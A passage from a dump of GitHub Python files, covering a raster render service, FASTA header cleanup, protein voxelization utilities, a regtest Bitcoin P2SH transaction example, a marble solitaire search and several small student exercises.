","repo_name":"dengbuqi/dffw","sub_path":"ros2_ws/src/dffw/dffw/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34948295707","text":"from geotrellis import *\n\nraster = load_raster(user_param(\"string\", \"raster\"))\nhist = histogram(raster)\nbreaks = get_color_breaks(hist)\npng = render_png(raster, breaks, hist)\n\nservice = Service(\"pyrender\",[(\"raster\",\"the raster to render\")], png)\n\nrun_service(service)\n","repo_name":"ahinz/geotrellis-sexp-example","sub_path":"src/main/resources/services/pyrender.py","file_name":"pyrender.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14820924919","text":"coding=\"UTF-8\"\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser('Parameter error, please enter the correct parameter!')\nparser.add_argument('-ref', help='ref')\nparser.add_argument('-u', help='unify')\nargs = parser.parse_args()\n\n# Enter the path where the file to be processed is located\nfile_path=args.ref\n#Enter the path where the file to be generated\nresult_dir=args.u\n\nif not os.path.exists(result_dir):\n os.mkdir(result_dir)\n\n\nfor file_name in os.listdir(file_path):\n \n if os.path.isfile(file_path+file_name):\n with open(file_path+file_name, 'r') as rf: \n with open(result_dir+\"/{}\".format(file_name),'w') as newf:\n for line in rf: \n if line == '':\n break\n elif line.startswith('>'):\n line=str(line)\n line1=line.split('_')[0]+'_'+'\\n'\n newf.write(line1)\n 
else:\n newf.write(line)\n ","repo_name":"10129086/Supplementary-codes-for-dissertation","sub_path":"shell/unify.py","file_name":"unify.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23545162442","text":"# Program: rectangle_main.py\n# Programmer: Kellen Land\n# Date: 11/01/2022\n# Description: Lab 8\n#################################\n\nimport rectangle_mod\n\nprint(\"Program - Find Area and Perimeter of Rectangle: \")\n\nrepeat = True\n\nwhile repeat:\n width = input(\"\\nEnter the rectangle's width (inches): \")\n width = float(width)\n length = float(input(\"Enter rectangle's length (inches): \"))\n \n area = rectangle_mod.find_area(width, length)\n perimeter = rectangle_mod.find_perimeter(width, length)\n \n print(f\"\\nThe area is {area:,.0f}\")\n print(f\"\\nThe perimeter is {perimeter:,.0f}\")\n \n again = input(\"\\nWould you like to do another calculation? (y/n) \")\n if again == 'n':\n repeat = False\n \nprint(\"\\nThanks for using this program. Goodbye.\\n\")","repo_name":"ktland/SchoolNotes","sub_path":"Fall 2022/Python/Labs/unit_3/lab_8/rectangle_main.py","file_name":"rectangle_main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21451296035","text":"import unittest\n\nfrom layoff import Solution\n\nclass Test(unittest.TestCase):\n def setUp(self) -> None:\n self.s = Solution()\n return super().setUp()\n\n def test1(self):\n digits = \"23\"\n out = [\"ad\",\"ae\",\"af\",\"bd\",\"be\",\"bf\",\"cd\",\"ce\",\"cf\"]\n self.assertEqual(self.s.letterCombinations(digits), out)\n\n def test2(self):\n digits = \"2\"\n out = [\"a\",\"b\",\"c\"]\n self.assertEqual(self.s.letterCombinations(digits), out) \n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"jerrt2003/leetcode-in-python","sub_path":"17_Letter_Combinations_of_a_Phone_Number/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70112511210","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 24 15:34:54 2022\nLast update: 3/4/2023\n\n@author: sudhanshu\n\"\"\"\n# from importlib.abc import Loader\n# from isort import file\nimport torch\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport os\nimport sys\n\nsys.path.append(\"..\")\nfrom data_preparation.data_utils import aa_1_letter_code\nfrom data_util import ThreeDDataset,PDB_NPZ_Dataset\nfrom settings import config1\n# For training specific\n\ndef save_checkpoint(state, filename=\"my_checkpoint.pth.tar\"):\n print(\"=> Saving checkpoint\")\n torch.save(state, filename)\n print(\"=> Saved checkpoint\")\n \n\n\ndef load_checkpoint(checkpoint, model, optimizer, mode = \"train\"):\n print(\"=> Loading checkpoint\")\n model.load_state_dict(checkpoint[\"state_dict\"]) \n if mode == \"train\":\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n return checkpoint[\"epoch\"], checkpoint[\"best\"]\n\n\ndef split_indices(n,val_part):\n n_val = int(val_part*n)\n idxn = np.random.permutation(n)\n return idxn[n_val:],idxn[:n_val]\n\ndef len_of_data(directory_,ext=\".npz\"):\n count = 0\n for i in os.listdir(directory_):\n if i.endswith(ext):\n count += 1\n return count\n\n\ndef get_loaders( train_dir, val_dir, batch_size, data_reader_and_transform,\n num_workers=4, pin_memory=True, 
layers = 0 ):\n \n train_ds = PDB_NPZ_Dataset( protein_dir=train_dir, transformer=data_reader_and_transform, train=1) \n train_loader = DataLoader( train_ds, batch_size=batch_size, num_workers=num_workers,\n pin_memory=pin_memory, shuffle=True )\n\n val_ds = PDB_NPZ_Dataset( protein_dir=val_dir, transformer=data_reader_and_transform)\n val_loader = DataLoader( val_ds, batch_size=1, num_workers=num_workers,\n pin_memory=pin_memory, shuffle=False )\n\n return train_loader, val_loader\n\n\n\ndef check_accuracy(loader, model, device=\"cuda\"):\n num_correct = 0\n num_pixels = 0\n dice_score = 0\n model.eval()\n\n\n with torch.no_grad():\n for x, y in loader:\n x = x.to(device,dtype=torch.float)\n y = y.to(device, dtype=torch.float).unsqueeze(1)\n #print(x.shape)\n #preds = torch.sigmoid(model(x))\n preds = model(x)\n #print(preds)\n preds = (preds > 0.5).float()\n num_correct += (preds == y).sum()\n num_pixels += torch.numel(preds)\n dice_score += (2*(preds * y).sum()) /((preds +y).sum() + 1e-8)\n\n print(\n f\"Got {num_correct}/{num_pixels} with acc {num_correct/num_pixels*100:.2f}\"\n )\n\n print (f\"Dice score: {dice_score/len(loader)}\")\n model.train()\n\n\ndef calc_accuracy(loader, model, device=\"cuda\"):\n dice_score = 0\n model.eval()\n with torch.no_grad():\n for count, (x, y) in enumerate(loader):\n x = x.to(device,dtype=torch.float)\n y = y.to(device, dtype=torch.float).unsqueeze(1)\n\n #preds = torch.sigmoid(model(x))\n preds = model(x)\n #print(preds)\n preds = (preds > 0.5).float()\n dice_score +=dice(y,preds)\n \n model.train()\n return dice_score/count\n\n\ndef save_predictions_as_masks(loader, model, folder= \"saved_masks\", device =\"cuda\"):\n model.eval()\n\n for idx, (x,y) in enumerate(loader): \n x = x.to(device=device, dtype=torch.float)\n with torch.no_grad():\n #preds = torch.sigmoid(model(x))\n preds = model(x)\n preds = (preds > 0.5).float()\n\n xx = x.cpu()\n for idx2, i in enumerate(range(xx.shape[0])):\n np.savez(folder + \"/\" + f\"protein_{idx}_{idx2}.npz\",\n layers = xx[i,...],\n )\n \n \n np.savez(folder + \"/\" + f\"pred_{idx}_{idx2}.npz\",\n interaction= preds[i].cpu(),\n )\n \n np.savez(folder + \"/\" + f\"real_{idx}_{idx2}.npz\",\n interaction= y[i].cpu(),\n )\n\n model.train() \n \n \ndef dice(y_true, y_pred, smoothing_factor=0.01):\n y_true_f = torch.flatten(y_true,1)\n \n y_pred_f = torch.flatten(y_pred,1)\n # print(y_true_f, y_pred_f,\"----\")\n intersection = torch.sum(y_true_f * y_pred_f)\n return ((2. 
* intersection + smoothing_factor)\n / (torch.sum(y_true_f) + torch.sum(y_pred_f) + smoothing_factor))\n\n\ndef dice_loss(y_true, y_pred):\n #print(y_true.shape, y_pred.shape)\n return -dice(y_true, y_pred)\n\n \ndef report_file_name(directory, use_previous=0):\n file_init = directory + \"/report_\"\n for i in range(1000):\n trial_file = file_init + (\"%4d\" % (i+1)).replace(\" \",\"0\") + \".dat\"\n if not os.path.exists(trial_file):\n if use_previous == 1:\n trial_file = file_init + (\"%4d\" % (i)).replace(\" \",\"0\") + \".dat\"\n break\n \n return trial_file\n \n \n \nclass xyz_to_rotate_to_voxelize_to_translate:\n # if the size is bigger than cube_size\n #it randomely cuts data to fit in a cube\n \n def __init__(self):\n self.voxel_size_A = 2\n self.cube_size = 36\n self.aa_seq = aa_1_letter_code()\n self.max_pixel_translate_per_axis = 3\n self.max_rotation_plus_minus = 180\n self.cube_start_points = -1 # -1 for random\n self.use_CA_vetor = 1\n self.use_res_index = 0 # for prediction output in predictor\n self.return_res_numbers_from_1 = 0\n self.layers_use = 32\n self.layer_29_type = 0 #CA=0 #CB=1 #CB-CArray=3 works for layers_use=29\n self.crop_extra_edge = 0\n self.randomize_by = 0.0 #A # for training only\n #self.pdb_f=pdb_functions() only for debugging\n \n\n def apply(self, xyz_data, static_data, train =0): \n self.xyz_data = xyz_data\n self.rotate_coordinates_by( self.max_rotation_plus_minus )\n \n self.xyz_beta_data = self.xyz_data[range(0,len(self.xyz_data),2),:]\n self.xyz_alpha_data = self.xyz_data[range(1,len(self.xyz_data),2),:]\n beta_rand = 0\n alpha_rand = 0\n # print(\"HI\", self.randomize_by, train)\n if train == 1:\n if self.randomize_by > 0:\n beta_rand = (np.random.rand(self.xyz_beta_data.shape[0], \n self.xyz_beta_data.shape[1])*2 -1)*self.randomize_by\n alpha_rand = (np.random.rand(self.xyz_alpha_data.shape[0],\n self.xyz_alpha_data.shape[1])*2 -1)*self.randomize_by\n \n self.xyz_beta_data = self.xyz_beta_data + beta_rand\n self.xyz_alpha_data = self.xyz_alpha_data + alpha_rand\n \n \n self.static_data = static_data \n # Send translational details to next routine \n self.change_coordinates_for_voxel_dimension(self.xyz_beta_data)#, translate_data)\n self.calculate_unit_vectors()\n self.voxelize()\n return self.voxel_layers, self.voxel_mask\n \n \n def change_coordinates_for_voxel_dimension(self, xyz_coords):\n n = self.voxel_size_A \n \n xyz_vox = np.round( xyz_coords/n)\n min_ = np.min(xyz_vox, 0)\n xyz_vox = (xyz_vox - min_).astype(int) # normalizing \n \n max_vals = np.max( [ np.max(xyz_vox, 0) - self.cube_size +1 ,\n [0,0,0]],0) +1 + int(self.crop_extra_edge)\n \n \n away_from_center = (np.max([self.cube_size-np.max(xyz_vox,0),[0,0,0]],0)/2).astype(int)-1# finds movable pixels\n \n away_from_center = np.max([away_from_center,np.ones(3)*self.crop_extra_edge/2],0)\n \n # print(away_from_center)\n counter_ijk =np.zeros(3)\n counter = 0\n while 1: # to solve emply voxel problems\n if counter <=50:\n cube_start_points = np.zeros(3)+self.cube_start_points + counter_ijk \n if self.cube_start_points == -1:\n cube_start_points = np.random.randint(max_vals) \n \n \n \n translate_amount = np.zeros(3)\n if self.max_pixel_translate_per_axis != 0:\n translate_amount = (np.min(\n [ np.random.randint((self.max_pixel_translate_per_axis,)*3), \n away_from_center],0) * \n ((np.random.randint((2,)*3) -0.5)/0.5)).astype(int)\n \n \n \n translate_from_center = (translate_amount-away_from_center).astype(int) \n \n \n # 
print(translate_amount,away_from_center,translate_amount-away_from_center)\n # print(max_vals)\n # print(cube_start_points)\n \n # print(cube_start_points,max_vals)\n xyz_use_index1 = xyz_vox >= cube_start_points\n xyz_use_index2 = xyz_vox < (cube_start_points + self.cube_size - self.crop_extra_edge)\n \n indexes = xyz_use_index1 & xyz_use_index2\n indexes = np.sum(indexes,1)==3\n #print(counter_ijk, max_vals, counter ,sum(indexes), len(indexes))\n if sum(indexes) > 5: # minimum coordinates should be 5\n break\n \n for pit in range(3):\n if counter_ijk[pit] <= counter:\n counter_ijk[pit] += 1 \n if sum(counter_ijk == counter_ijk[0])== 3:\n counter +=1\n \n break\n \n if counter > 50: #HARD measure \n #print (\"index trap!\") \n counter_ijk =np.zeros(3)\n cube_start_points = np.random.randint(max_vals) \n \n \n xyz_vox = xyz_vox[indexes,:]\n \n # if ( (xyz_vox[:,0].size == 0) or (xyz_vox[:,1].size == 0) or (xyz_vox[:,1].size == 0)):\n # \n #print(xyz_vox.shape)\n try:\n xyz_vox[:,0] -= min(xyz_vox[:,0]) + translate_from_center[0]\n xyz_vox[:,1] -= min(xyz_vox[:,1]) + translate_from_center[1]\n xyz_vox[:,2] -= min(xyz_vox[:,2]) + translate_from_center[2]\n except:\n \n print(\"hey\" ,xyz_vox.shape)\n return 0\n \n \n self.xyz_vox = xyz_vox \n self.indexes = indexes\n \n def rotation_mat(self,theta,axis):\n pi=np.pi\n theta=theta*pi/180\n a = np.cos(theta/2)\n b,c,d = -axis*np.sin(theta/2)\n rot_mat=np.array([[a*a+b*b-c*c-d*d, 2*(b*c-a*d), 2*(b*d+a*c)],\n [2*(b*c+a*d), a*a+c*c-b*b-d*d, 2*(c*d-a*b)],\n [2*(b*d-a*c), 2*(c*d+a*b), a*a+d*d-b*b-c*c]]) \n \n return (rot_mat)#+origin) \n\n \n def rotate_coordinates_by(self,alfa):\n \n alfa = ((np.random.rand(1)*2)-1)*alfa\n if not alfa == 0:\n rotation_xyz = self.xyz_data\n origin = np.mean(self.xyz_data,0) # center of coordinates\n axist= rotation_xyz[np.random.randint(len(self.xyz_data))] - origin # random axis from CB\n \n axist = axist/np.sqrt(np.dot(axist,axist))\n rot_m = np.squeeze(self.rotation_mat(alfa,axist))\n t_data = rotation_xyz-origin\n \n for j in range (self.xyz_data.shape[0]):\n c_data=t_data[j]\n t_data[j]=np.dot(rot_m,c_data) \n \n self.xyz_data = t_data +origin\n \n # Center yaa translate rotate \n \n def calculate_unit_vectors(self): \n ## Calculating unit vector for required data only\n unit_v = self.xyz_alpha_data[self.indexes,:] - self.xyz_beta_data[self.indexes,:]\n # for i in unit_v:\n # print (i)\n \n self.use_CA_for_indexes = self.xyz_alpha_data[self.indexes,:]\n self.use_CB_for_indexes = self.xyz_beta_data[self.indexes,:]\n \n dist_v = np.sqrt(np.sum( unit_v**2,1))\n for i in range(len(unit_v)):\n if sum(unit_v[i]==0) == 3 :\n continue\n unit_v[i] = unit_v[i] / dist_v[i]\n \n self.unit_v = unit_v\n \n def voxelize(self):\n self.usable_static_data = np.array(self.static_data[1])[self.indexes]\n self.voxel_mask = []\n self.voxel_layers = []\n \n \n ca_cb_layers = 6\n if self.layers_use == 29:\n ca_cb_layers =3\n \n res_ind_layer = 0\n if self.use_res_index == 1:\n res_ind_layer = 2 # one for res number, one for chain\n \n \n property_layers = 5 # +1 for debuguibg case\n total_layers = (1+ #Voxel \n property_layers+ #PROPERTIES\n 20+ #ONE-HOT-AA\n ca_cb_layers + #for CA vector\n res_ind_layer)\n # 1+ # AA number for only recovery\n # 1 # interaction # not used in training etc. 
\n # )\n \n \n layers = np.zeros((total_layers,)+(self.cube_size,)*3)\n mask = np.zeros((1,)+(self.cube_size,)*3)\n \n if self.return_res_numbers_from_1 == 1:\n res_mat_from_1 = np.zeros((1,)+(self.cube_size,)*3)\n # print(layers.shape, layers[0].shape,)\n # print(\"here\",np.max(self.xyz_vox,0),\"done\")\n \n \n \n for counter, (i, j, k) in enumerate(self.xyz_vox): \n static_data_for_res = self.usable_static_data[counter]\n # print(i,j,k)\n aa_param_hydropathy = static_data_for_res[2]\n aa_param_aromaticity = static_data_for_res[3]\n aa_param_hbond_doner = static_data_for_res[4]\n aa_param_hbond_accept = static_data_for_res[5]\n \n aa_sasa = static_data_for_res[6] # index start from 1\n # if ((i>34) or (i>34) or (i>34)):\n # print(i,j,k)\n \n layers[0,i,j,k] = 1 # Voxel Layer\n layers[1,i,j,k] = aa_param_hydropathy # hydrophobic_layer\n layers[2,i,j,k] = aa_param_aromaticity # aromatic_layer\n layers[3,i,j,k] = aa_param_hbond_doner\n layers[4,i,j,k] = aa_param_hbond_accept \n layers[5,i,j,k] = aa_sasa # SASA\n #layers[4,i,j,k] = counter # for debugging\n \n # One hot layers for amino-acids\n #print(aa_type)\n aa_number = int(static_data_for_res[1] -1)\n \n aa_index = 1 + property_layers + aa_number # after property layers\n layers[aa_index,i,j,k] = 1\n\n # CA unit vectors 26 27 28 X Y Z\n \n # layers[26,i,j,k] = self.unit_v[counter][0]*self.use_CA_vetor\n # layers[27,i,j,k] = self.unit_v[counter][1]*self.use_CA_vetor\n # layers[28,i,j,k] = self.unit_v[counter][2]*self.use_CA_vetor\n \n #Trying CB and CA coordinate3s\n if self.layers_use == 32:\n layers[26,i,j,k] = self.use_CA_for_indexes[counter][0]\n layers[27,i,j,k] = self.use_CA_for_indexes[counter][1]\n layers[28,i,j,k] = self.use_CA_for_indexes[counter][2]\n \n layers[29,i,j,k] = self.use_CB_for_indexes[counter][0]\n layers[30,i,j,k] = self.use_CB_for_indexes[counter][1]\n layers[31,i,j,k] = self.use_CB_for_indexes[counter][2]\n \n elif self.layers_use == 29:\n if self.layer_29_type == 0:\n layers[26,i,j,k] = self.use_CA_for_indexes[counter][0]\n layers[27,i,j,k] = self.use_CA_for_indexes[counter][1]\n layers[28,i,j,k] = self.use_CA_for_indexes[counter][2]\n elif self.layer_29_type == 1:\n layers[26,i,j,k] = self.use_CB_for_indexes[counter][0]\n layers[27,i,j,k] = self.use_CB_for_indexes[counter][1]\n layers[28,i,j,k] = self.use_CB_for_indexes[counter][2]\n else:\n layers[26,i,j,k] = self.unit_v[counter][0]*self.use_CA_vetor\n layers[27,i,j,k] = self.unit_v[counter][1]*self.use_CA_vetor\n layers[28,i,j,k] = self.unit_v[counter][2]*self.use_CA_vetor\n \n \n\n\n ## just checking^^^^\n \n if self.use_res_index ==1:\n # amino acid number for connnectivity recovery starts from 1\n # do not use for training\n layers[-2,i,j,k] = static_data_for_res[7]\n layers[-1,i,j,k] = static_data_for_res[8]\n # interaction layer \n #print(self.all_interacting_aa_from_all_atoms)\n # interaction_voxel = self.only_protein_residues[counter+1] \n # print(mask.shape)\n mask[0,i,j,k] = static_data_for_res[-1]\n \n if self.return_res_numbers_from_1 == 1:\n res_mat_from_1[0,i,j,k] = static_data_for_res[0]\n \n self.voxel_mask = mask\n self.voxel_layers = layers\n if self.return_res_numbers_from_1 == 1:\n self.res_mat_from_1 = res_mat_from_1\n # def coordinates_for_ground_truth_and_predicted(self):\n # xyz_cb_true = []\n \n \ndef is_model_params_correct():\n if not os.path.exists(config1.model_root_directory):\n print(\"Please set the correct model_root_directory in settings.py\")\n return 0\n return 1\n \n\n\n \nif __name__ == \"__main__\": \n from 
data_preparation.pdb_2_interaction_file_converter import pdb_to_interaction_file\n dir_ = \"/home/sudhanshu/HDD3/Data/Sudhanshu/pdb_chains/dataset/pdbs/bad/pdb_npz/\"\n for i in range(1):\n \n print(i)\n \n pdb_file = '/home/sudhanshu/HDD3/Data/Sudhanshu/pdb_chains/dataset/pdbs/bad/1M1J_3_000.pdb'\n \n #s,x=load_pdb_npz_to_static_data_and_coordinates(dir_ + '1M1J_3_000_data.pdb.npz')\n f = pdb_to_interaction_file(pdb_file, './',0, verbose=0)\n f.carb_aa_distance_calc_and_save = 1 \n f.save_data =0\n s,x = f.run_me() \n \n \n for i in range(len(s[1])):\n s[1][i][-1]= 0\n \n \n xyz_vx = xyz_to_rotate_to_voxelize_to_translate()\n xyz_vx.max_pixel_translate_per_axis=0\n xyz_vx.max_rotation_plus_minus = 0\n xyz_vx.cube_start_points = 0\n xyz_vx.use_res_index =0\n f,u=xyz_vx.apply(x,s)\n \n \n # xyz_vx.pdb_f.read_pdb('/home/sudhanshu/HDD3/Data/Sudhanshu/pdb_chains/dataset/random_rotated/pdbs/test/CB_test.pdb')\n # xyz_vx.pdb_f.dump_pdb('./temp_files/m0.pdb')\n # xyz_vx.pdb_f.xyz_data =xyz_vx.xyz_beta_data\n # xyz_vx.pdb_f.refresh_from_xyz()\n # xyz_vx.pdb_f.dump_pdb('./temp_files/m1.pdb')\n # np.savez( './temp_files/xx.npz',\n # layers = f)\n \n # np.savez('./temp_files/xx_mask.npz',\n # interaction= u\n # )\n# print(np.max(f,0)-np.min(f,0))\n\n# fig = plt.figure()\n# ax = fig.add_subplot(projection='3d')\n\n# plt.scatter(f[:,0],f[:,1],f[:,2])\n\n","repo_name":"Graylab/CAPSIF","sub_path":"capsif_v/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19354,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41114098466","text":"#!/usr/bin/env python3\n\n\"\"\"\nExample of a Pay-to-Script-Hash (P2SH) transaction.\n\nP2SH is next in the evolution of Bitcoin transactions. Instead of \nlocking the transaction to the hash of a public key, we lock it to \nthe hash of a Bitcoin Script program. This moves the storage of the \nscript program itself to the transaction input.\n\n\"\"\"\n\nimport os, sys\n\nsys.path.append(os.path.dirname(__file__).split('/transactions')[0])\n\nfrom lib.encoder import encode_tx, encode_script\nfrom lib.helper import encode_address, decode_address, hash_script\nfrom lib.hash import hash160, hash256\nfrom lib.sign import sign_tx\nfrom lib.rpc import RpcSocket\n\n## Setup our RPC socket.\nrpc = RpcSocket({ 'wallet': 'regtest' })\nassert rpc.check()\n\n## Get a utxo for Alice.\nalice_utxo = rpc.get_utxo(0)\nfund_value = alice_utxo['value'] - 1000\n\n## Get a payment address for Bob.\nbob_funding_txout = rpc.get_recv(fmt='base58')\nbob_funding_hash = decode_address(bob_funding_txout['address'])\nbob_spending_txout = rpc.get_recv(fmt='base58')\nbob_spending_hash = decode_address(bob_spending_txout['address'])\n\n## Convert the secret to bytes, then hash using hash160 function.\nsecret_message = 'superisatestnet'\nsecret_bytes = secret_message.encode('utf8').hex()\nsecret_hash = hash160(secret_bytes).hex()\n\n## Here is the script we will be using.\nlock_script_words = [\n 'OP_HASH160', secret_hash, 'OP_EQUALVERIFY', \n 'OP_DUP', 'OP_HASH160', bob_funding_hash, 'OP_EQUALVERIFY',\n 'OP_CHECKSIG'\n]\n\n## This is the hex-encoded data that we will present to unlock the output.\nlock_script_code = encode_script(lock_script_words, prepend_len=False).hex()\n\n## This is the hash of the script. 
The output will be locked to this script hash.\nlocking_script_hash = hash_script(lock_script_words)\n\nfunding_tx = {\n 'version': 1,\n 'vin': [{\n 'txid': alice_utxo['txid'],\n 'vout': alice_utxo['vout'],\n 'script_sig': [],\n 'sequence': 0xFFFFFFFF\n }],\n 'vout': [{\n 'value': fund_value,\n 'script_pubkey': ['OP_HASH160', locking_script_hash, 'OP_EQUAL']\n }],\n 'locktime': 0\n}\n\n## Since we have the complete transaction, we can calculate the transaction ID.\nfunding_txid = hash256(bytes.fromhex(encode_tx(funding_tx)))[::-1].hex()\n\n## The redeem script is a basic Pay-to-Pubkey-Hash template.\nutxo_redeem_script = f\"76a914{alice_utxo['pubkey_hash']}88ac\"\n\n## We are signing Alice's UTXO using BIP143 standard.\nalice_signature = sign_tx(\n funding_tx, # The transaction.\n 0, # The input being signed.\n alice_utxo['value'], # The value of the utxo being spent.\n utxo_redeem_script, # The redeem script to unlock the utxo. \n alice_utxo['priv_key'] # The private key to the utxo pubkey hash.\n)\n\n## Include the arguments needed to unlock the redeem script.\nfunding_tx['vin'][0]['witness'] = [ alice_signature, alice_utxo['pub_key'] ]\n\nspending_tx = {\n 'version': 1,\n 'vin': [{\n 'txid': funding_txid,\n 'vout': 0,\n 'script_sig': [],\n 'sequence': 0xFFFFFFFF\n }],\n 'vout': [{\n 'value': fund_value - 1000,\n 'script_pubkey': ['OP_DUP', 'OP_HASH160', bob_spending_hash, 'OP_EQUALVERIFY', 'OP_CHECKSIG']\n }],\n 'locktime': 0\n}\n\n## Since we have the complete transaction, we can calculate the transaction ID.\nspending_txid = hash256(bytes.fromhex(encode_tx(spending_tx)))[::-1].hex()\n\n## Bob is signging to release the funds.\nbob_signature = sign_tx(\n spending_tx, # The transaction.\n 0, # The input being signed.\n fund_value, # The value of the utxo being spent.\n lock_script_code, # The redeem script to unlock the utxo. \n bob_funding_txout['priv_key'] # The private key to the utxo pubkey hash.\n)\n\nspending_tx['vin'][0]['script_sig'] = [ \n bob_signature, bob_funding_txout['pub_key'], secret_bytes, lock_script_code \n]\n\nprint(f'''\n## Pay-to-Script-Hash Example ##\n\n-- Funding Transaction Id --\n{funding_txid}\n\n-- Alice UTXO --\n Txid : {alice_utxo['txid']}\n Vout : {alice_utxo['vout']}\n Value : {alice_utxo['value']}\n Hash : {alice_utxo['pubkey_hash']}\n\n-- Funding Address --\n Address : {encode_address(locking_script_hash)}\n Coins : {fund_value}\n\n-- Funding Tx Hex --\n{encode_tx(funding_tx)}\n\n-- Redeem Transaction Id --\n{funding_txid}\n\n-- Redeem Tx Hex --\n{encode_tx(spending_tx)}\n\n''')\n","repo_name":"cmdruid/bitcoin-programming","sub_path":"contrib/python/transactions/wip/p2sh.py","file_name":"p2sh.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"13142493972","text":"#5. Faça um Programa que leia 20 números inteiros e armazene-os num vetor. Armazene os números pares no vetor PAR e os números IMPARES no vetor ímpar. 
Imprima os três vetores.\n\n\nimport array as arr\n\nvetor = arr.array('i', [])\nvPar = arr.array('i', [])\nvImpar = arr.array('i', [])\ncontador = 0\n\nwhile contador <=19:\n num = int(input('Digite um número: '))\n vetor.append(num)\n if num%2==0:\n vPar.append(num)\n else:\n vImpar.append(num)\n contador += 1\n\n\n# print(\"\\n O primeiro vetor formado foi:\")\n\nprint('vetor',vetor)\nprint('par', vPar)\nprint('impar',vImpar)\n\n","repo_name":"AnaCandida/NlTalentosPython","sub_path":"aula2AnaQuadros/exc5.py","file_name":"exc5.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27109743313","text":"\"\"\"Marble solitaire forward search.\n\nUsage:\n search_forward BOARD_NAME\n\"\"\"\nimport time\nimport pickle\nfrom pathlib import Path\n\nfrom docopt import docopt\n\nfrom search import initialize_for_board, children, unique_boards, int_to_board\nfrom board_io import print_board\n\n\ndef forward_search(board_name):\n\n def save_bit_boards(index, bit_boards):\n with Path(filename_format.format(board_name, index)).open('wb') as file_out:\n pickle.dump(bit_boards, file_out)\n\n filename_format = '{}-board-{:03d}.pkl'\n starting_position = initialize_for_board(board_name)\n boards_at_move = [{starting_position}]\n save_bit_boards(0, boards_at_move[0])\n while True:\n\n filename = Path(filename_format.format(board_name, len(boards_at_move)))\n if filename.exists():\n with filename.open('rb') as file_in:\n boards_at_move.append(pickle.load(file_in))\n print(f'Moves {len(boards_at_move) - 1:4}, loaded {len(boards_at_move[-1]):10} unique boards')\n continue\n\n t_start = time.process_time()\n next_board_ids = children(boards_at_move[-1])\n board_count = len(next_board_ids)\n t_search = time.process_time()\n\n if not next_board_ids: # we are done\n break\n\n boards_at_move.append(unique_boards(next_board_ids))\n t_dedupe = time.process_time()\n\n save_bit_boards(len(boards_at_move) - 1, boards_at_move[-1])\n t_save = time.process_time()\n\n t_search, t_dedupe, t_save = t_search - t_start, t_dedupe - t_search, t_save - t_dedupe\n print(f'Moves {len(boards_at_move) - 1:4}, boards {board_count:10} ({len(boards_at_move[-1]):10} unique) '\n f'search/dedupe/save: {t_search:6.2f} / {t_dedupe:6.2f} / {t_save:6.2f} seconds')\n\n print('Saving boards...')\n t_start = time.process_time()\n filename = f'{board_name}-boards.pkl'\n with Path(filename).open('wb') as file_out:\n pickle.dump(boards_at_move, file_out)\n print(f'Saved {filename} in {time.process_time() - t_start:.3f} seconds')\n\n for index in range(len(boards_at_move)):\n Path(filename_format.format(board_name, index)).unlink()\n\n print(f'{len(boards_at_move[-1])} final unique boards for {board_name} board')\n for index, board in enumerate(boards_at_move[-1]):\n print(f'#{index} [{board}]')\n print_board(int_to_board(board))\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version='Board explorer v1.0')\n forward_search(args['BOARD_NAME'])\n","repo_name":"r1cc4rdo/marble_solitaire","sub_path":"search_forward.py","file_name":"search_forward.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22626247677","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 20 20:35:36 2023\r\n\r\n@author: Madeline\r\n\"\"\"\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport matplotlib . 
pyplot as plt\r\nfrom scipy . io import arff\r\nfrom sklearn.cluster import DBSCAN\r\nfrom sklearn import metrics\r\nfrom sklearn.neighbors import NearestNeighbors\r\n\r\n\r\npath = './artificial/'\r\ndatabrut = arff . loadarff ( open ( path + \"chainlink.arff\" , 'r') )\r\ndatanp = [ [ x[0] ,x[1]] for x in databrut [0] ]\r\n# Affichage en 2D\r\n# Extraire chaque valeur de features pour en faire une liste\r\n# Ex pour f0 = [ - 0 . 499261 , -1 . 51369 , -1 . 60321 , ...]\r\n# Ex pour f1 = [ - 0 . 0612356 , 0 . 265446 , 0 . 362039 , ...]\r\ndatanp = np.asarray(datanp)\r\nf0 = datanp [:,0] # tous les elements de la premiere colonne\r\nf1 = datanp [:,1] # tous les elements de la deuxieme colonne\r\nplt.scatter( f0, f1, s = 8 )\r\nplt.title(\"Donnees initiales \")\r\nplt.show()\r\n\r\n\r\n#Distances k plus proches voisins\r\n# Donnees dans X\r\nk = 5\r\nneigh = NearestNeighbors(n_neighbors = k)\r\nneigh.fit(datanp)\r\ndistances , indices = neigh.kneighbors(datanp)\r\n# retirer le point \" origine \"\r\nnewDistances = np.asarray ( [ np.average ( distances [ i ] [ 1 : ] ) for i in range (0, distances.shape[0])] )\r\ntrie = np.sort(newDistances)\r\nplt.title(\" Plus proches 